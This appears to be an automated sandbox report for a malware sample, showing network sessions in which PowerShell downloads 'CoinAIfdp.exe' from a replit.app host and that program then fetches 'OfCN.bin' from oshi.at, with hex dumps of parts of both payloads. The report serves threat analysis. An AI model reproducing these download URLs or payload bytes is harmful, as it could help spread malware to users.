                                      2024-07-30 09:11:24 UTC1390INData Raw: 16 6a 81 cf 7d 24 0e 7e 7a ce 8c 13 9e c5 db 5f 96 34 31 ad 68 d8 1a 32 0b f4 80 22 22 02 3c d2 4d ae 4b 8e 1d ac 10 97 09 1b 09 23 2f a9 79 71 78 c7 f7 ab 5d d2 b3 0a f1 93 6b 3e 63 1b 76 9f 79 c9 7b 05 57 4e da aa 79 60 78 05 b2 30 b4 83 d5 b5 55 4b d7 07 3b 55 cf 15 1b e9 8c 02 65 e3 0e 4d fa 50 14 2e bb 1d 5f 30 3b 0c ec e3 8c b2 b7 5b 32 0e 63 de ba 76 bd 3a 63 aa b9 0d 54 32 54 f1 6d 39 b9 bb 57 a0 98 97 83 a5 9e f8 c6 b5 f0 b4 ea b3 50 64 02 d7 ac 5c 1a 2d b6 d1 34 26 00 63 78 c8 66 c0 47 d9 f4 a0 29 0d 5f 09 dc 59 4d 55 0d 3b 8d 46 79 86 bf 3c d7 a0 fc 1f 71 9d d7 17 5b 22 ad ad 32 1e 31 a0 9d 6c ca 8f eb 78 25 d8 ea aa 9d 50 69 99 99 7e b0 c9 bf 4a b3 5a 37 c0 34 98 1e d8 ca 2a 76 06 86 37 2e ac 90 12 6a 22 20 08 46 60 83 ef 19 22 20 29 ef 09 7b
                                      Data Ascii: j}$~z_41h2""<MK#/yqx]k>cvy{WNy`x0UK;UeMP._0;[2cv:cT2Tm9WPd\-4&cxfG)_YMU;Fy<q["21lx%Pi~JZ74*v7.j" F`" ){
                                      2024-07-30 09:11:24 UTC1390INData Raw: 6c 9e c5 d5 76 9f 8f dc 9e c5 d5 76 9f 8f dc 80 d6 f8 c6 77 82 71 8c ef 05 b2 7b 17 55 da 7e 3f 72 7b 17 55 da 7e 3f 72 03 5b e3 19 de 09 c6 33 bc 16 c9 ec 5d 57 69 f8 fd c9 ec 5d 57 69 f8 fd c8 0d 6f 8c 67 78 27 18 ce f0 5b 27 b1 75 5d a7 e3 f7 27 b1 75 5d a7 e3 f7 20 35 be 31 9d e0 9c 63 3b c1 6c 9e c5 d5 76 9f 8f dc 9e c5 d5 76 9f 8f dc 80 d6 f8 c6 77 82 71 8c ef 05 b2 7b 17 55 da 7e 3f 72 7b 17 55 da 7e 3f 72 03 5b e3 19 de 09 c6 33 bc 16 c9 ec 5d 57 69 f8 fd c9 ec 5d 57 69 f8 fd c8 0d 6f 8c 67 78 2e 1a 89 3f 13 27 16 e1 af aa 72 5b 57 b1 75 5d a7 e3 f7 27 b1 75 5d a7 e3 f7 21 0d 5d 58 a3 5a 4b 93 1d f2 f7 f3 47 1d c5 67 b7 50 9c be 0a 27 e3 74 af db 51 ff 00 ba f4 d6 4c 00 65 39 c9 0b 1e 7f ee 6e 7f f0 b8 fa 3b 67 96 8b 73 f9 2e b8 62 54 23 6d 27 c8
                                      Data Ascii: lvvwq{U~?r{U~?r[3]Wi]Wiogx'['u]'u] 51c;lvvwq{U~?r{U~?r[3]Wi]Wiogx.?'r[Wu]'u]!]XZKGgP'tQLe9n;gs.bT#m'


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.84970834.117.33.2334436764C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-30 09:11:27 UTC206OUTGET /CoinAIfdp.exe HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                      Host: secured-order-download-businessportal.replit.app
                                      Connection: Keep-Alive
                                      2024-07-30 09:11:27 UTC253INHTTP/1.1 200 OK
                                      Content-Length: 402432
                                      Content-Type:
                                      Strict-Transport-Security: max-age=63072000; includeSubDomains
                                      Date: Tue, 30 Jul 2024 09:11:27 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close
                                      2024-07-30 09:11:27 UTC1137INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f4 0d 8e f6 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 1a 06 00 00 08 00 00 00 00 00 00 fe 37 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL.07 @@ `
                                      2024-07-30 09:11:27 UTC1390INData Raw: 05 00 00 00 fe 0e 01 00 38 00 00 00 00 fe 0c 01 00 45 17 00 00 00 cb 02 00 00 0e 03 00 00 c7 00 00 00 f5 00 00 00 ee 01 00 00 58 00 00 00 8e 00 00 00 8d 03 00 00 07 00 00 00 c8 01 00 00 9f 01 00 00 19 01 00 00 3a 00 00 00 4e 02 00 00 b5 02 00 00 37 02 00 00 9c 02 00 00 68 01 00 00 3b 03 00 00 2f 01 00 00 05 00 00 00 1b 02 00 00 55 01 00 00 38 c6 02 00 00 00 2a 11 05 20 83 a8 c7 52 20 4c 7e 17 3c 61 7e e6 01 00 04 7b c3 01 00 04 61 28 5e 00 00 06 7e 31 02 00 04 28 77 05 00 06 13 07 20 0d 00 00 00 38 65 ff ff ff 11 03 11 02 11 00 7e 2f 02 00 04 28 6f 05 00 06 20 0a 00 00 00 fe 0e 01 00 38 43 ff ff ff 00 7e 2a 02 00 04 28 5b 05 00 06 7e 2b 02 00 04 28 5f 05 00 06 13 00 20 04 00 00 00 7e e6 01 00 04 7b e5 01 00 04 39 1c ff ff ff 26 20 00 00 00 00 38 11 ff ff
                                      Data Ascii: 8EX:N7h;/U8* R L~<a~{a(^~1(w 8e~/(o 8C~*([~+(_ ~{9& 8
                                      2024-07-30 09:11:27 UTC1390INData Raw: ff ff ff 26 20 00 00 00 00 38 9b ff ff ff 00 dc 20 02 00 00 00 7e e6 01 00 04 7b df 01 00 04 39 b7 fe ff ff 26 20 01 00 00 00 38 ac fe ff ff 11 04 2a 00 73 13 00 00 0a 13 00 20 00 00 00 00 7e e6 01 00 04 7b f4 01 00 04 39 8d fe ff ff 26 20 00 00 00 00 38 82 fe ff ff 01 10 00 00 02 00 29 00 8d b6 00 91 00 00 00 00 1b 30 05 00 f0 02 00 00 05 00 00 11 20 03 00 00 00 fe 0e 00 00 38 00 00 00 00 fe 0c 00 00 45 08 00 00 00 2b 02 00 00 05 00 00 00 3a 00 00 00 a1 02 00 00 29 00 00 00 60 00 00 00 2a 00 00 00 7b 02 00 00 38 26 02 00 00 38 71 02 00 00 20 00 00 00 00 7e e6 01 00 04 7b b6 01 00 04 3a bd ff ff ff 26 20 00 00 00 00 38 b2 ff ff ff 2a 00 38 f9 ff ff ff 20 07 00 00 00 38 a1 ff ff ff 11 07 3a ea 01 00 00 20 01 00 00 00 7e e6 01 00 04 7b 23 02 00 04 39 86 ff
                                      Data Ascii: & 8 ~{9& 8*s ~{9& 8)0 8E+:)`*{8&8q ~{:& 8*8 8: ~{#9
                                      2024-07-30 09:11:27 UTC19INData Raw: 00 04 39 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe
                                      Data Ascii: 9& 8
                                      2024-07-30 09:11:27 UTC1390INData Raw: 0c 03 00 45 01 00 00 00 05 00 00 00 38 00 00 00 00 00 00 dd 88 00 00 00 11 0d 39 61 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b b7 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 04 00 45 02 00 00 00 05 00 00 00 30 00 00 00 38 00 00 00 00 11 0d 7e 38 02 00 04 28 93 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b 04 02 00 04 3a ce ff ff ff 26 20 01 00 00 00 38 c3 ff ff ff 00 dc 20 00 00 00 00 7e e6 01 00 04 7b c9 01 00 04 3a 29 ff ff ff 26 20 00 00 00 00 38 1e ff ff ff dd 88 00 00 00 11 08 39 61 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b da 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 09 00 45 02 00 00 00 05 00 00 00 30 00 00 00 38 00 00 00 00 11 08 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b af 01 00 04 3a ce ff
                                      Data Ascii: E89a ~{:& 8E08~8( ~{:& 8 ~{:)& 89a ~{:& 8E08~8( ~{:
                                      2024-07-30 09:11:27 UTC1390INData Raw: 00 00 00 00 dd 9b 00 00 00 11 0b 3a 5d 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b fc 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0e 00 45 03 00 00 00 05 00 00 00 29 00 00 00 3f 00 00 00 38 00 00 00 00 38 36 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b a9 01 00 04 3a d1 ff ff ff 26 20 01 00 00 00 38 c6 ff ff ff 11 0b 7e 38 02 00 04 28 93 05 00 06 20 02 00 00 00 38 b0 ff ff ff 00 dc 20 01 00 00 00 7e e6 01 00 04 7b fe 01 00 04 39 16 ff ff ff 26 20 01 00 00 00 38 0b ff ff ff dd 9b 00 00 00 11 07 3a 24 00 00 00 20 02 00 00 00 38 04 00 00 00 fe 0c 01 00 45 03 00 00 00 05 00 00 00 54 00 00 00 30 00 00 00 38 00 00 00 00 11 07 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b f2 01 00 04 39 ca ff ff ff 26 20 01 00 00 00 38 bf ff ff ff
                                      Data Ascii: :] ~{:& 8E)?886 ~{:& 8~8( 8 ~{9& 8:$ 8ET08~8( ~{9& 8
                                      2024-07-30 09:11:27 UTC1316INData Raw: 28 00 00 00 11 07 6f 1a 00 00 0a 13 01 20 01 00 00 00 7e e6 01 00 04 7b e5 01 00 04 39 b5 ff ff ff 26 20 01 00 00 00 38 aa ff ff ff 00 38 2a 00 00 00 20 03 00 00 00 38 04 00 00 00 fe 0c 0c 00 45 04 00 00 00 af 00 00 00 5f 00 00 00 05 00 00 00 37 00 00 00 38 aa 00 00 00 00 00 11 05 7e 4c 02 00 04 28 e3 05 00 06 3a 1f 00 00 00 20 00 00 00 00 7e e6 01 00 04 7b b1 01 00 04 3a bf ff ff ff 26 20 00 00 00 00 38 b4 ff ff ff 11 05 6f 1b 00 00 0a 13 08 20 01 00 00 00 7e e6 01 00 04 7b ce 01 00 04 39 97 ff ff ff 26 20 00 00 00 00 38 8c ff ff ff 00 20 3d 8d 70 42 20 b9 9d 66 71 61 7e e6 01 00 04 7b e9 01 00 04 61 28 17 00 00 06 11 08 7e 50 02 00 04 28 f3 05 00 06 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02 00 04 28 9b 05 00 06 20 02 00 00 00
                                      Data Ascii: (o ~{9& 88* 8E_78~L(: ~{:& 8o ~{9& 8 =pB fqa~{a(~P(~<(~9(~:(
                                      2024-07-30 09:11:27 UTC1390INData Raw: 04 28 6f 05 00 06 20 02 00 00 00 7e e6 01 00 04 7b 0b 02 00 04 39 c8 ff ff ff 26 20 01 00 00 00 38 bd ff ff ff 00 17 13 03 20 01 00 00 00 7e e6 01 00 04 7b a9 01 00 04 39 a5 ff ff ff 26 20 01 00 00 00 38 9a ff ff ff dd 3f ff ff ff 13 02 20 02 00 00 00 38 04 00 00 00 fe 0c 01 00 45 03 00 00 00 05 00 00 00 83 00 00 00 28 00 00 00 38 00 00 00 00 00 16 13 03 20 01 00 00 00 7e e6 01 00 04 7b 02 02 00 04 3a d2 ff ff ff 26 20 01 00 00 00 38 c7 ff ff ff 00 20 f0 dc 53 45 20 7d 95 31 54 61 7e e6 01 00 04 7b b3 01 00 04 61 28 17 00 00 06 11 02 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02 00 04 28 9b 05 00 06 20 00 00 00 00 7e e6 01 00 04 7b 07 02 00 04 3a 77 ff ff ff 26 20 00 00 00 00 38 6c ff ff ff dd 96 fe ff ff 20 02 00 00 00 7e e6 01 00
                                      Data Ascii: (o ~{9& 8 ~{9& 8? 8E(8 ~{:& 8 SE }1Ta~{a(~<(~9(~:( ~{:w& 8l ~
                                      2024-07-30 09:11:27 UTC1390INData Raw: 04 7b fd 01 00 04 3a 0f 00 00 00 26 20 00 00 00 00 38 04 00 00 00 fe 0c 0e 00 45 03 00 00 00 05 00 00 00 3f 00 00 00 14 00 00 00 38 00 00 00 00 38 36 00 00 00 20 02 00 00 00 38 db ff ff ff 11 0c 7e 38 02 00 04 28 93 05 00 06 20 01 00 00 00 7e e6 01 00 04 7b e1 01 00 04 3a bb ff ff ff 26 20 01 00 00 00 38 b0 ff ff ff 00 dc 13 08 20 01 00 00 00 7e e6 01 00 04 7b e7 01 00 04 39 0f 00 00 00 26 20 02 00 00 00 38 04 00 00 00 fe 0c 07 00 45 03 00 00 00 05 00 00 00 83 00 00 00 28 00 00 00 38 00 00 00 00 00 16 13 06 20 01 00 00 00 7e e6 01 00 04 7b 06 02 00 04 3a d2 ff ff ff 26 20 01 00 00 00 38 c7 ff ff ff 00 20 8b 34 4f cb 20 12 39 5f 9d 61 7e e6 01 00 04 7b ab 01 00 04 61 28 17 00 00 06 11 08 7e 3c 02 00 04 28 a3 05 00 06 7e 39 02 00 04 28 97 05 00 06 7e 3a 02
                                      Data Ascii: {:& 8E?886 8~8( ~{:& 8 ~{9& 8E(8 ~{:& 8 4O 9_a~{a(~<(~9(~:
                                      2024-07-30 09:11:27 UTC1316INData Raw: ef 00 00 72 3d 00 00 87 c1 00 00 48 36 00 00 22 53 00 00 99 6b 00 00 16 51 00 00 a7 dc 00 00 0f 22 00 00 e9 63 00 00 65 7b 00 00 bc ca 00 00 c8 cc 00 00 e3 16 00 00 d7 20 00 00 64 ce 00 00 87 5f 00 00 e6 0b 01 00 f7 a5 00 00 85 1a 00 00 23 a7 00 00 65 6a 00 00 fe 7d 00 00 31 05 00 00 13 a6 00 00 1f fc 00 00 04 38 00 00 98 61 00 00 0e 79 00 00 df a7 00 00 1f d4 00 00 95 87 00 00 f7 00 00 00 24 0b 01 00 c0 9e 00 00 da 0e 01 00 e2 00 00 00 0e 87 00 00 c3 ae 00 00 0c a5 00 00 f0 82 00 00 db 06 01 00 49 b3 00 00 fb c2 00 00 2b 97 00 00 36 83 00 00 92 58 00 00 5a 56 00 00 9f 75 00 00 f4 ae 00 00 3e 03 00 00 40 17 01 00 b5 e0 00 00 c3 3d 00 00 e7 8e 00 00 fc 33 00 00 29 c4 00 00 93 43 00 00 28 8c 00 00 d2 56 00 00 31 bc 00 00 d2 5f 00 00 fd be 00 00 05 1c 00 00
                                      Data Ascii: r=H6"SkQ"ce{ d_#ej}18ay$I+6XZVu>@=3)C(V1_


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.8497095.253.86.154433796C:\Users\user\AppData\Local\Temp\CoinAIfdp.exe
                                      TimestampBytes transferredDirectionData
                                      2024-07-30 09:11:31 UTC70OUTGET /qNzy/OfCN.bin HTTP/1.1
                                      Host: oshi.at
                                      Connection: Keep-Alive
                                      2024-07-30 09:11:32 UTC315INHTTP/1.1 200 OK
                                      Server: nginx
                                      Date: Tue, 30 Jul 2024 09:11:31 GMT
                                      Content-Type: application/octet-stream
                                      Content-Length: 77269
                                      Connection: close
                                      Content-Disposition: attachment; filename=OfCN.bin
                                      Last-Modified: Sat, 20 Jul 2024 16:05:39 GMT
                                      Accept-Ranges: bytes
                                      ETag: "18f7ad42456cdee3fee6ee9b5d45b065"
                                      2024-07-30 09:11:32 UTC3768INData Raw: e8 c0 cb 00 00 c0 cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 52 d2 55 f6 a3 22 83 f7 9a 15 70 5a 2f 9a 5f 79 df c1 77 0f 2e ec ec 6a 83 03 2a 8e 2e 62 52 c4 bc 7b 87 83 94 f9 a0 76 f7 52 bd bb de b3 a6 f4 16 3e e8 18 63 20 e0 ef 7d 07 01 7e 7c 40 29 8f cc d6 a8 85 66 d4 b2 e5 97 91 ad b2 af 28 3d 0b 41 fb af 1a 65 5f c4 33 79 d1 d7 63 8a 8d a8 5e 55 44 bf 16 5e 57 6f bc 96 82 13 bf f9 cf 04 e4 9c c1 72 36 c1 bb ed 9c 18 cc be b1 47 24 6a f9 92 a4 60 1a ba fa e6 00 22 29 08 aa d0 e2 e6 3d 6e a8 7f f5 f9 7c 1c 08 79 7a b7 81 ec 5c a8 31 e3 d2 5e 79 bd 9e 1e 9b 41 6b 44 a1 18 a2 53 bd cb 08 51 89 4f 24 33 a8 1d ab b7 6b d5 7d 80 87 5f cc f4 8c 6c 49 95 21 8a
                                      Data Ascii: RU"pZ/_yw.j*.bR{vR>c }~|@)f(=Ae_3yc^UD^Wor6G$j`")=n|yz\1^yAkDSQO$3k}_lI!
                                      2024-07-30 09:11:32 UTC4096INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                      Data Ascii:
                                      2024-07-30 09:11:32 UTC4096INData Raw: 52 00 00 00 06 28 29 00 00 0a 0c 16 0d 38 39 00 00 00 08 09 a3 32 00 00 01 13 04 28 06 00 00 06 11 04 07 6f 2a 00 00 0a 28 06 00 00 06 6f 2b 00 00 0a 39 05 00 00 00 dd c3 00 00 00 dd 06 00 00 00 26 dd 00 00 00 00 09 17 58 0d 09 08 8e 69 32 c1 38 a9 00 00 00 28 06 00 00 06 06 07 6f 2c 00 00 0a 38 98 00 00 00 73 2d 00 00 0a 13 05 72 22 21 00 70 72 22 21 00 70 73 2e 00 00 0a 13 06 11 05 11 06 6f 2f 00 00 0a 11 05 7e 0e 00 00 04 6f 30 00 00 0a 17 8d 38 00 00 01 25 16 72 24 21 00 70 a2 16 6f 31 00 00 0a 13 07 11 07 16 a3 38 00 00 01 80 02 00 00 04 11 07 73 27 00 00 0a 17 11 07 8e 69 6f 32 00 00 0a a3 38 00 00 01 80 01 00 00 04 28 06 00 00 06 7e 02 00 00 04 7e 01 00 00 04 28 15 00 00 0a 6f 2c 00 00 0a dd 0f 00 00 00 11 05 39 07 00 00 00 11 05 6f 33 00 00 0a dc
                                      Data Ascii: R()892(o*(o+9&Xi28(o,8s-r"!pr"!ps.o/~o08%r$!po18s'io28(~~(o,9o3
                                      2024-07-30 09:11:32 UTC4096INData Raw: 28 a6 00 00 0a 13 04 dd 1a 00 00 00 06 39 06 00 00 00 06 6f 33 00 00 0a dc 26 72 66 25 00 70 13 04 dd 00 00 00 00 11 04 2a 01 28 00 00 02 00 31 00 2f 60 00 0d 00 00 00 00 02 00 1f 00 7c 9b 00 0d 00 00 00 00 00 00 00 00 a8 a8 00 0d 01 00 00 01 13 30 02 00 39 00 00 00 0f 00 00 11 28 a7 00 00 0a 0a 16 0b 38 24 00 00 00 06 07 a3 0a 00 00 01 0c 08 6f a8 00 00 0a 02 6f a9 00 00 0a 28 aa 00 00 0a 39 02 00 00 00 08 2a 07 17 58 0b 07 06 8e 69 32 d6 14 2a 00 00 00 1b 30 01 00 17 00 00 00 00 00 00 00 20 03 00 00 80 28 3c 00 00 06 26 dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 10 00 00 00 00 00 00 10 10 00 06 01 00 00 01 1b 30 03 00 40 00 00 00 10 00 00 11 20 00 01 00 00 73 ab 00 00 0a 0a 28 38 00 00 06 06 20 00 01 00 00 28 39 00 00 06 16 3e 0c 00 00 00 06 6f 38 00 00
                                      Data Ascii: (9o3&rf%p*(1/`|09(8$oo(9*Xi2*0 (<&&*0@ s(8 (9>o8
                                      2024-07-30 09:11:32 UTC4096INData Raw: 6a 2a 00 00 00 13 30 02 00 87 00 00 00 20 00 00 11 02 7b 36 00 00 04 0a 06 1a 59 45 07 00 00 00 16 00 00 00 05 00 00 00 52 00 00 00 52 00 00 00 27 00 00 00 33 00 00 00 40 00 00 00 38 4d 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 fb 00 00 0a 2a 02 7b 35 00 00 04 74 38 00 00 01 28 fc 00 00 0a 2a 02 7b 35 00 00 04 a5 96 00 00 01 2a 02 7b 35 00 00 04 a5 97 00 00 01 6c 2a 02 7b 35 00 00 04 a5 6b 00 00 01 28 fa 00 00 0a 6c 2a 23 00 00 00 00 00 00 00 00 2a 00 13 30 02 00 a4 00 00 00 21 00 00 11 02 7b 36 00 00 04 0a 06 1a 59 45 08 00 00 00 16 00 00 00 05 00 00 00 6e 00 00 00 6e 00 00 00 27 00 00 00 38 00 00 00 49 00 00 00 62 00 00 00 38 69 00 00 00 02 7b 35 00 00 04 a5 68 00 00 01 28 e7 00 00 0a 2a 02 7b 35 00 00 04 6f 38 00 00 0a 28 54 00 00 06 2a 02 7b 35 00
                                      Data Ascii: j*0 {6YERR'3@8M{5h(*{5t8(*{5*{5l*{5k(l*#*0!{6YEnn'8Ib8i{5h(*{5o8(T*{5
                                      2024-07-30 09:11:32 UTC4096INData Raw: 00 bc 1d 00 00 23 53 74 72 69 6e 67 73 00 00 00 00 e4 3b 00 00 a4 27 00 00 23 55 53 00 88 63 00 00 10 00 00 00 23 47 55 49 44 00 00 00 98 63 00 00 40 09 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 9f a2 3f 09 0a 00 00 00 fa 25 33 00 16 00 00 01 00 00 00 9b 00 00 00 1e 00 00 00 47 00 00 00 a3 00 00 00 71 00 00 00 02 00 00 00 0a 01 00 00 13 00 00 00 31 00 00 00 02 00 00 00 2e 00 00 00 04 00 00 00 13 00 00 00 20 00 00 00 04 00 00 00 03 00 00 00 06 00 00 00 06 00 00 00 02 00 00 00 01 00 00 00 08 00 00 00 04 00 00 00 01 00 00 00 00 00 f1 0a 01 00 00 00 00 00 06 00 3b 19 f0 0f 0a 00 91 00 05 16 0a 00 a1 19 74 18 0a 00 8b 0f 87 1d 06 00 2b 14 9a 0b 06 00 84 08 05 16 0a 00 a4 10 05 16 0a 00 10 18 87 1d 06 00 fb 19 f0 0f 0e 00 07 12 f1 0b 0e 00 c6 18
                                      Data Ascii: #Strings;'#USc#GUIDc@#BlobW?%3Gq1. ;t+
                                      2024-07-30 09:11:32 UTC4096INData Raw: 25 00 00 00 00 96 00 43 0f c5 02 61 00 0c 56 00 00 00 00 96 00 5c 0c cb 02 62 00 d4 56 00 00 00 00 96 00 38 1d d2 02 64 00 ab 25 00 00 00 00 96 00 d9 18 da 02 66 00 c6 25 00 00 00 00 96 00 2c 06 e1 02 68 00 e6 25 00 00 00 00 96 00 66 10 e8 02 6a 00 74 57 00 00 00 00 96 00 a8 00 ef 02 6c 00 a4 57 00 00 00 00 96 00 a6 13 f6 02 6e 00 78 20 00 00 00 00 86 18 03 15 0e 00 70 00 e8 58 00 00 00 00 96 00 69 18 84 01 70 00 74 59 00 00 00 00 96 00 60 18 84 01 71 00 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 c8 0a 00 00 01 00 a9 07 00 00 01 00 50 13 00 00 02 00 ae 08 00 00 03 00 ae 10 00 00 04 00 20 18 00 00 01 00 d0 12 00 00 01 00 17 0d
                                      Data Ascii: %CaV\bV8d%f%,h%fjtWlWnx pXiptY`qP
                                      2024-07-30 09:11:32 UTC4096INData Raw: 00 45 58 45 43 55 54 49 4f 4e 5f 53 54 41 54 45 00 38 37 36 33 39 31 32 36 45 41 37 37 42 33 35 38 46 32 36 35 33 32 33 36 37 44 42 41 36 37 43 35 33 31 30 45 46 35 30 41 38 44 39 38 38 38 45 44 30 37 30 43 44 34 30 45 31 46 36 30 35 41 38 46 00 67 65 74 5f 41 53 43 49 49 00 53 79 73 74 65 6d 2e 49 4f 00 49 73 58 50 00 42 44 4f 53 00 45 53 5f 43 4f 4e 54 49 4e 55 4f 55 53 00 67 65 74 5f 49 56 00 73 65 74 5f 49 56 00 47 65 6e 65 72 61 74 65 49 56 00 4d 54 58 00 76 61 6c 75 65 5f 5f 00 52 65 61 64 53 65 72 76 65 72 74 44 61 74 61 00 64 61 74 61 00 6d 73 63 6f 72 6c 69 62 00 53 79 73 74 65 6d 2e 43 6f 6c 6c 65 63 74 69 6f 6e 73 2e 47 65 6e 65 72 69 63 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 00 67 65 74 5f 53 65 6e 64 53 79 6e 63 00
                                      Data Ascii: EXECUTION_STATE87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8Fget_ASCIISystem.IOIsXPBDOSES_CONTINUOUSget_IVset_IVGenerateIVMTXvalue__ReadServertDatadatamscorlibSystem.Collections.GenericMicrosoft.VisualBasicget_SendSync
                                      2024-07-30 09:11:32 UTC990INData Raw: 49 6d 61 67 65 43 6f 64 65 63 49 6e 66 6f 00 53 65 6e 64 49 6e 66 6f 00 46 69 6c 65 49 6e 66 6f 00 44 72 69 76 65 49 6e 66 6f 00 46 69 6c 65 53 79 73 74 65 6d 49 6e 66 6f 00 43 6f 6d 70 75 74 65 72 49 6e 66 6f 00 43 53 68 61 72 70 41 72 67 75 6d 65 6e 74 49 6e 66 6f 00 50 72 6f 63 65 73 73 53 74 61 72 74 49 6e 66 6f 00 57 72 69 74 65 4d 61 70 00 50 72 65 76 65 6e 74 53 6c 65 65 70 00 5a 69 70 00 63 75 72 72 65 6e 74 41 70 70 00 4d 69 63 72 6f 73 6f 66 74 2e 43 53 68 61 72 70 00 47 72 6f 75 70 00 4e 6f 72 6d 61 6c 53 74 61 72 74 75 70 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 43 6c 65 61 72 00 43 68 61 72 00 49 6e 76 6f 6b 65 4d 65 6d 62 65 72 00 4d 44 35 43 72 79 70 74 6f 53 65 72 76 69 63 65 50 72 6f 76 69 64 65 72 00 52 53 41 43 72 79 70 74 6f 53 65 72 76
                                      Data Ascii: ImageCodecInfoSendInfoFileInfoDriveInfoFileSystemInfoComputerInfoCSharpArgumentInfoProcessStartInfoWriteMapPreventSleepZipcurrentAppMicrosoft.CSharpGroupNormalStartupSystem.LinqClearCharInvokeMemberMD5CryptoServiceProviderRSACryptoServ
                                      2024-07-30 09:11:32 UTC4096INData Raw: 73 00 47 65 74 50 72 6f 63 65 73 73 65 73 00 47 65 74 48 6f 73 74 41 64 64 72 65 73 73 65 73 00 53 79 73 74 65 6d 2e 53 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 58 35 30 39 43 65 72 74 69 66 69 63 61 74 65 73 00 45 6e 63 6f 64 65 32 42 79 74 65 73 00 47 65 74 55 74 66 38 42 79 74 65 73 00 75 74 66 38 42 79 74 65 73 00 52 66 63 32 38 39 38 44 65 72 69 76 65 42 79 74 65 73 00 52 65 61 64 41 6c 6c 42 79 74 65 73 00 44 65 63 6f 64 65 46 72 6f 6d 42 79 74 65 73 00 53 77 61 70 42 79 74 65 73 00 4c 6f 61 64 46 69 6c 65 41 73 42 79 74 65 73 00 47 65 74 41 73 42 79 74 65 73 00 53 65 74 41 73 42 79 74 65 73 00 47 65 74 42 79 74 65 73 00 72 61 77 42 79 74 65 73 00 62 79 74 65 73 00 43 53 68 61 72 70 41 72 67 75 6d 65 6e 74 49 6e 66 6f 46 6c 61
                                      Data Ascii: sGetProcessesGetHostAddressesSystem.Security.Cryptography.X509CertificatesEncode2BytesGetUtf8Bytesutf8BytesRfc2898DeriveBytesReadAllBytesDecodeFromBytesSwapBytesLoadFileAsBytesGetAsBytesSetAsBytesGetBytesrawBytesbytesCSharpArgumentInfoFla


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:05:11:20
                                      Start date:30/07/2024
